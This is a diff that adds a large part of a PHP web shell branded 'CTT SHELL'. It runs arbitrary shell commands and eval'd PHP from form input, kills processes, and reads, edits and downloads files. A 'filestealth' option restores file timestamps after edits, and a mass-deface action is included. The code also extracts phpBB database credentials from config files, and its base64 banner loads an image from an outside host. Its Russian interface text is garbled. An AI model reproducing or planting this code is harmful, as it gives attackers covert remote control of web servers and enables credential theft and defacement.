+$tab[dirs] = array_reverse($tab[dirs]);
+$tab[files] = array_reverse($tab[files]);
+  }
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "<TABLE class=table1  cellSpacing=0 cellPadding=0 width=100% border=0>
+<form method=\"POST\">";
+$smsn=0;
+  foreach($table as $row)
+  {
+$smsn++;
+ if ($smsn!=2 && $smsn!=3) { 
+echo "<tr>\r\n";
+foreach($row as $v) {echo "<td class=tds1 bgcolor=#242424>".$v."</td>\r\n";}
+echo "</tr>\r\n";
+}
+
+  }
+  echo "</table><TABLE height=1% class=table2 cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0>
+<tr class=tr2>
+<td width=8% height=1%><font size=2 color=#000000>
+�����: ".(count($tab[dirs])+count($tab[links]))."</font></td>
+<td width=8% height=1%><font size=2 color=#000000> �����: ".count($tab[files])."</font></td><td height=1% vAlign=top align=right>";
+if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"��������\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"������ �����\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=\"act\"><option value=\"".$act."\">� ����������:</option>";
+  echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">�������</option>";
+  if ($usefsbuff)
+  {
+echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">��������</option>";
+echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">����������</option>";
+echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">���������</option>";
+  }
+  if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">���������</option>";}
+  echo "</select>&nbsp;<input type=\"submit\" value=\"�����������\">";
+  echo "</form>";
+
+echo "</td></tr></table>";
+echo "</td></tr></table><br><center><font size=2 color=#aaaaaa>[<a href=http://ctt.void.ru>CTT</a>] SHELL ver ".$shver."</font></center>";
+ }
+
+}
+if ($act == "cmd")
+{
+ if (!empty($submit))
+ {
+  echo "<b>��������� ���������� ��� �������</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+myshellexec($cmd);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($cmd_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($cmd_txt)
+{
+ echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ myshellexec($cmd);
+ echo "</textarea>";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>������� ����������:</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"���������\"><input type=\"hidden\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "ps_aux")
+{
+ echo "<b>��������:</b><br>";
+ if ($win) {
+echo "<pre>";
+system('tasklist');
+echo "</pre>";
+}
+ else
+ {
+  if ($pid)
+  {
+if (!$sig) {$sig = 9;}
+echo "Sending signal ".$sig." to #".$pid."... ";
+$ret = posix_kill($pid,$sig);
+if ($ret) {echo "ok. he is dead, amen.";}
+else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+$ret = htmlspecialchars($ret);
+$ret = str_replace(""," ",$ret);
+while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+$prcs = explode("\n",$ret);
+$head = explode(" ",$prcs[0]);
+$head[] = "ACTION";
+unset($prcs[0]);
+echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+echo "<tr border=\"1\">";
+foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
+echo "</tr>";
+foreach ($prcs as $line)
+{
+ if (!empty($line))
+ {
+  echo "<tr>";
+  $line = explode(" ",$line);
+  $line[10] = join(" ",array_slice($line,10,count($line)));
+  $line = array_slice($line,0,11);
+  $line[] = "<a href=\"".$sul."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+  foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
+  echo "</tr>";
+ }
+}
+echo "</table>";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>��������� ���������� ���� PHP-���</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+eval($eval);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($eval_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($eval_txt)
+{
+ echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ eval($eval);
+ echo "</textarea>";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>PHP-��� ����������</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"���������\"></form>";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$sul."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+
+  echo "<b>������������ �����:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$sul."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  if (is_writable($d.$f)) {echo "<font color=\"green\">������ ������ ������/������ (".view_perms(fileperms($d.$f)).")</font>";}
+  else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
+ 
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+echo "<b>Information:</b>";
+echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+if (!$win)
+{
+ echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";
+ $tmp=posix_getpwuid(fileowner($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+ else echo $tmp['name']." ";
+ $tmp=posix_getgrgid(filegroup($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+ else echo $tmp['name'];
+}
+echo "<tr class=tr><td><b>Perms</b></td><td>";
+
+if (is_writable($d.$f))
+{
+ echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
+}
+else
+{
+ echo "<font>".view_perms(fileperms($d.$f))."</font>";
+}
+
+echo "</td></tr>";
+echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+echo "</table><br>";
+
+
+$fi = fopen($d.$f,"rb");
+if ($fi)
+{
+ if ($fullhexdump)
+ {
+  echo "<b>FULL HEXDUMP</b>";
+  $str=fread($fi,filesize($d.$f));
+ }
+ else
+ {
+  echo "<b>HEXDUMP PREVIEW</b>";
+  $str=fread($fi,$hexdump_lines*$hexdump_rows);
+ }
+ $n=0;
+ $a0="00000000<br>";
+ $a1="";
+ $a2="";
+ for ($i=0; $i<strlen($str); $i++)
+ {
+  $a1.=sprintf("%02X",ord($str[$i])).' ';
+  switch (ord($str[$i]))
+  {
+case 0:  $a2.="<font class=s2>0</font>"; break;
+case 32: 
+case 10:
+case 13: $a2.="&nbsp;"; break;
+default:  $a2.=htmlspecialchars($str[$i]);
+  }
+  $n++;
+  if ($n == $hexdump_rows)
+  {
+$n = 0;
+if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
+$a1.="<br>";
+$a2.="<br>";
+  }
+ }
+ echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
+"class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
+"$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
+}
+$encoded = "";
+if ($base64 == 1)
+{
+ echo "<b>Base64 Encode</b><br>";
+ $encoded = base64_encode($r);
+}
+elseif($base64 == 2)
+{
+ echo "<b>Base64 Encode + Chunk</b><br>";
+ $encoded = chunk_split(base64_encode($r));
+}
+elseif($base64 == 3)
+{
+ echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+ $encoded = base64_encode($r);
+ $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+}
+elseif($base64 == 4)
+{
+}
+if (!empty($encoded))
+{
+ echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+}
+echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+if ($white) {@ob_clean();}
+echo $r;
+if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+echo "<pre>".htmlspecialchars($r)."</pre>";
+  }
+  elseif ($ft == "ini")
+  {
+echo "<pre>";
+var_dump(parse_ini_file($d.$f,true));
+echo "</pre>";
+  }
+  elseif ($ft == "phpsess")
+  {
+echo "<pre>";
+$v = explode("|",$r);
+echo $v[0]."<br>";
+var_dump(unserialize($v[1]));
+echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
+  }
+  elseif ($ft == "sdb")
+  {
+echo "<pre>";
+var_dump(unserialize(base64_decode($r)));
+echo "</pre>";
+  }
+  elseif ($ft == "code")
+  {
+if (ereg("phpBB 2.(.*) auto-generated config file",$r))
+{
+ $arr = explode("
+",$r);
+ if (count($arr == 18))
+ {
+  include($d.$f);
+  echo "<b>phpBB configuration is detected in this file!<br>";
+  if ($dbms == "mysql4") {$dbms = "mysql";}
+  if ($dbms == "mysql") {echo "<a href=\"".$sul."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+  else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ctshell";}
+  echo "Parameters for manual connect:<br>";
+  $cfgvars = array(
+  "dbms"=>$dbms,
+  "dbhost"=>$dbhost,
+  "dbname"=>$dbname,
+  "dbuser"=>$dbuser,
+  "dbpasswd"=>$dbpasswd 
+  );
+  foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ 
+  echo "</b>";
+  echo "<hr size=\"1\" noshade>";
+ }
+}
+echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
+if (!empty($white)) {@ob_clean();}
+if ($rehtml) {$r = rehtmlspecialchars($r);} 
+$r = stripslashes($r); 
+$strip = false;
+if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
+$r = @highlight_string($r, TRUE); 
+if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);}
+echo $r;
+if (!empty($white)) {exit;}
+echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+@ob_clean();
+header("Content-type: ctshell");
+header("Content-disposition: attachment; filename=\"".$f."\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "notepad")
+  {
+@ob_clean();
+header("Content-type: text/plain"); 
+header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+echo($r); 
+exit;
+  }
+  elseif ($ft == "img")
+  {
+if (!$white)
+{
+ echo "<center><img src=\"".$sul."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
+}
+else
+{
+ @ob_clean();
+ $ext = explode($f,".");
+ $ext = $ext[count($ext)-1];
+ header("Content-type: image/gif"); 
+ echo($r); 
+ exit;
+}
+  }
+  elseif ($ft == "edit")
+  {
+if (!empty($submit))
+{
+ if ($filestealth) {$stat = stat($d.$f);}
+ if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
+ $fp = fopen($d.$f,"w");
+ if (!$fp) {echo "<b>Can't write to file!</b>";}
+ else
+ {
+  echo "<b>���������!!!</b>";
+  fwrite($fp,$nfcontent);
+  fclose($fp);
+  if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+  $r = $nfcontent;
+ }
+}
+$rows = count(explode("
+",$r));
+if ($rows < 10) {$rows = 10;}
+if ($rows > 30) {$rows = 30;}
+echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"���������\">&nbsp;<input type=\"reset\" value=\"�����\">&nbsp;<br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "phpinfo")
+{
+ ob_end_clean();
+ phpinfo();
+ exit;
+}
+}
+$data = base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9IzAwZmYwMD5DeWJlciBUZXJyb3Jpc20gVGVhbTwvZm9udD48YnI+PGZvbnQgc2l6ZT0yPg0KyOTl/ywg6Ofs5e3l7ej/IOTo5+Dp7eAg6CDx6vDo7/LgIOTu4eDi6Os6PC9mb250PjxpbWcgc3JjPWh0dHA6Ly9vbmxpbmUubWlyYWJpbGlzLmNvbS9zY3JpcHRzL29ubGluZS5kbGw/aWNxPTMzNTk3NjAyMSZpbWc9NSBoZWlnaHQ9MTggd2lkdGg9MTg+PGZvbnQgc2l6ZT0yIGNvbG9yPSNGRkRFMDA+IFJPRE5PQzwvZm9udD48L2NlbnRlcj4=");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhEQAPAKIAAO/v8N3e387OzpSt72NzrVFZfCkxUv///yH5BAUUAAcALAAAAAARAA8AAANSe".
+"Grc3uoYAEq4wWZqFtWXVnBehWUhKQ1V4b6uagwsZd/ATO84ru+0k/C3MxCOSIyDZhQ4nYRnZ2UQRJ9".
+"W6aKaxV4F02r1CwWDF2bYyzyVPN6dBAA7",
+"edit"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhDgAQALMPAKt5E8uYM7SBHLyJJMaTLsGOKaRyDJ5sBv/MZ//////ge//rhf/Ub//3kf//m".
+"f///yH5BAEAAA8ALAAAAAAOABAAAARF8MlJq704axo6yUEiJsUVOqiTDIPgSkEjz6MIPMGi7/xyE4q".
+"gcKj4MY7IJONWQDifUAQzSr0NqFErFnp7uASAsMFwKD8iADs=",
+"small_unk"=>
+"R0lGODlhEQAUANUhAOXl1c3MzJiYmCkufnoRE83MzTNOoszLzO4jI/HqQIeGh5iYlxZ7PRh8PXLM".
+"2FRVVMvLyzRNofbHPnsRE+bm1QgJCebl1FRUVFVVVIaGh1VVVQcICCoufoaFhYWGhszMzP///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACEALAAAAAARABQAAAaewJBw".
+"SCwaj0hPZpnxOD2dhdFDsVgBV4tAU+yAvmCwAHQhesNhwQVTFnoVS2gn0/FsIJiht8ORcP4DfxVk".
+"QxkgfIF/gBuEQh6HaF8WjHmOIIYJBF8GIBSUQ49eBAggBg4RniBclo8gE18MDQCDqyGhAFUUuLi0".
+"oCAbFRvAwcCMtWeRYW0hGQcfAc/QBQEFzpUhbBoaGNsP2mtrSOLjSEEAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
